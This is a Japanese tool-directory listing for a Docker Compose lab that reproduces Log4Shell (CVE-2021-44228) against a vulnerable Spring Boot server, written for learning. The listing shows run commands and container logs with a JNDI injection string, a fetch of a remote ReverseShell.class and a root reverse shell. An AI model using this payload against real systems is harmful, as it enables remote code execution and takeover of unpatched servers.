Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44228-PoC — 自己完結型のラボ環境で、すべてDocker Composeからエクスプロイトを安全に実行できます。 | Kitploit
ツール/GitHubGitHub/j3kz/cve-2021-44228-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ペイロード開発ラボと実践
GitHubj3kz/cve-2021-44228-poc

CVE-2021-44228-PoC

自己完結型のラボ環境で、すべてDocker Composeからエクスプロイトを安全に実行できます。

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4Shell (CVE-2021-44228) でリバースシェルを実行する自己完結型ラボ環境 PoC

これは、Docker Compose を使用して、エクスプロイトを安全に実行する自己完結型のラボ環境です。

影響を受けるバージョンは Apache Log4j <=2.0–2.14.1 であり、CVE は CVE-2021-44228(CVSS スコア: 10.0)として追跡されています。

Apache Log4j を至急バージョン 2.16+ にパッチ適用してください !!!

前提条件

このコードには Docker と Docker Compose が必要です。

説明

Dockerfile と docker-compose.yml ファイルは、ラボ環境をビルドして起動するための内容がそのまま記載されています。

被害者サーバー log4shell-server は、spring initializr のデモプロジェクトを使用して構築されており、spring-boot-starter-log4j2 2.6.1 を介して脆弱なバージョンの Log4j 2.14.1 を含みます。

脆弱なコードは DemoApplication.java 内にあります。

リモートコード実行 は rce-server によって提供されます。

中間の LDAP サーバー は、Java Unmarshaller Security - データをコード実行に変える に基づいています。

攻撃ベクトルは このスクリプト から実行され、reverse-shell サーバーへの接続をセットアップします。

リバースシェルサーバー は接続を待ち受け、リバースシェルを介して コマンド例 echo $(whoami) を送信します。このコマンドは被害者サーバー log4shell-server 上で実行されます。

使用方法

root@kitploit:~
git clone https://github.com/j3kz/CVE-2021-44228-PoC.git
cd CVE-2021-44228-PoC
docker compose up
root@kitploit:~
ldap-server       | Listening on 0.0.0.0:1389

LDAP サーバーの準備が完了し、待受中です。

root@kitploit:~
reverse-shell     | listening on [::]:4242 ...

リバースシェルサーバーの準備が完了し、待受中です。

root@kitploit:~
log4shell-server  |
log4shell-server  |   .   ____          _            __ _ _
log4shell-server  |  /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
log4shell-server  | ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
log4shell-server  |  \\/  ___)| |_)| | | | | || (_| |  ) ) ) )
log4shell-server  |   '  |____| .__|_| |_|_| |_\__, | / / / /
log4shell-server  |  =========|_|==============|___/=/_/_/_/
log4shell-server  |  :: Spring Boot ::                (v2.6.1)
log4shell-server  |
log4shell-server  | 2021-12-18 12:31:37.695  INFO 1 --- [           main] c.e.d.DemoApplication                    : Starting DemoApplication using Java 1.8.0_181 on 46edaaf2f7eb with PID 1 (/app/spring-boot-application.jar started by root in /)
log4shell-server  | 2021-12-18 12:31:37.739  INFO 1 --- [           main] c.e.d.DemoApplication                    : No active profile set, falling back to default profiles: default
log4shell-server  | 2021-12-18 12:31:42.337  INFO 1 --- [           main] o.s.b.w.e.t.TomcatWebServer              : Tomcat initialized with port(s): 8080 (http)
log4shell-server  | 2021-12-18 12:31:42.439  INFO 1 --- [           main] o.a.c.c.StandardService                  : Starting service [Tomcat]
log4shell-server  | 2021-12-18 12:31:42.440  INFO 1 --- [           main] o.a.c.c.StandardEngine                   : Starting Servlet engine: [Apache Tomcat/9.0.55]
log4shell-server  | 2021-12-18 12:31:42.717  INFO 1 --- [           main] o.a.c.c.C.[.[.[/]                        : Initializing Spring embedded WebApplicationContext
log4shell-server  | 2021-12-18 12:31:42.718  INFO 1 --- [           main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 4549 ms
log4shell-server  | 2021-12-18 12:31:44.660  INFO 1 --- [           main] o.s.b.w.e.t.TomcatWebServer              : Tomcat started on port(s): 8080 (http) with context path ''

脆弱なサーバーの準備が完了し、待受中です。

root@kitploit:~
attack-vector     | 👌 log4shell-server:8080 is listening!
attack-vector     | 🚀 Sending attack vector ...

攻撃サーバーが接続を待機し、攻撃ベクトルを送信しています。

root@kitploit:~
log4shell-server  | 2021-12-18 12:31:44.740  INFO 1 --- [           main] c.e.d.DemoApplication                    : Started DemoApplication in 8.402 seconds (JVM running for 11.113)
log4shell-server  | 2021-12-18 12:31:45.110  INFO 1 --- [nio-8080-exec-1] o.a.c.c.C.[.[.[/]                        : Initializing Spring DispatcherServlet 'dispatcherServlet'
log4shell-server  | 2021-12-18 12:31:45.110  INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Initializing Servlet 'dispatcherServlet'
log4shell-server  | 2021-12-18 12:31:45.112  INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Completed initialization in 2 ms
ldap-server       | Send LDAP reference result for attack-vector redirecting to http://rce-server:3000/ReverseShell.class
rce-server        | 172.31.0.3 - - [18/Dec/2021:12:31:45 +0000] "GET /ReverseShell.class HTTP/1.1" 200 891 "" "Java/1.8.0_181"

脆弱なサーバーがリクエストを実行およびログ記録するため、LDAP サーバーは RCE サーバーに RCE を要求しています。

root@kitploit:~
reverse-shell     | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:43877 ([::ffff:172.31.0.3]:43877)
reverse-shell     | 👻 Hello from the log4shell-server! We are root.
reverse-shell     | listening on [::]:4242 ...
reverse-shell     | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:41249 ([::ffff:172.31.0.3]:41249)

RCE が実行され、被害者サーバーがリバースシェルを開き、リバースシェルサーバーがリモートコマンドを実行できるようになります。

root@kitploit:~
log4shell-server  | 2021-12-18 12:31:45.187  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello  param:name: ReverseShell@22fb868
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:host: log4shell-server:8080
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:user-agent: curl/7.80.0
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:accept: */*

被害者サーバーが攻撃ベクトルのリクエストをログ記録しています。

root@kitploit:~
attack-vector     | 🔥 Server returned:
attack-vector     | > HTTP/1.1 200
attack-vector     | > Content-Type: text/plain;charset=UTF-8
attack-vector     | > Content-Length: 52
attack-vector     | > Date: Sat, 18 Dec 2021 12:31:45 GMT
attack-vector     | >
attack-vector     | > Hello ${jndi:ldap://ldap-server:1389/attack-vector}!
attack-vector     | Attack should be successfull, have a nice day!

攻撃ベクトルはレスポンスをログに記録し、処理を終了します。

免責事項

このリポジトリは、この脆弱性から学ぶことのみを目的としています。

このプロジェクトは、被害者サーバーの所有者の同意なしに CVE-2021-44228 を悪意を持って悪用することを意図しておらず、そのように使用することはできません。

悪意のある活動のためのいかなる使用も禁止されており、厳しい法律によって罰せられます。

参照

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

https://www.lunasec.io/docs/blog/log4j-zero-day/

https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

https://github.com/christophetd/log4shell-vulnerable-app

ツールをダウンロード